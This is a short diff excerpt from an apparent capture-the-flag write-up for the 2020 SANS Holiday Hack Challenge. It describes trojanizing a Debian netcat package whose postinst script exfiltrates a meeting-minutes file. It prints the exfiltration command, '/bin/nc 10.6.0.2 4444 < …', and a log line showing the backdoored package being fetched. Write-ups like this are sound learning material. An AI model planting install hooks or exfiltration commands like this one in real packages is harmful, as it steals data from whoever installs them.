joergschwarzwaelder/hhc2020/Objective-9/README.md

     10.6.6.35 - - [12/Dec/2020 17:37:02] "GET /pub/jfrost/backdoor/suriv_amd64.deb HTTP/1.1" 404 -

-On the device the Debian package `netcat-traditional_1.10-41.1ubuntu1_amd64.deb` was found.
+On the local host the Debian package `netcat-traditional_1.10-41.1ubuntu1_amd64.deb` was found.
 This package was modified to include a netcat command in the postinst script to send the text file to our local host:

 `/bin/nc 10.6.0.2 4444 < /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt`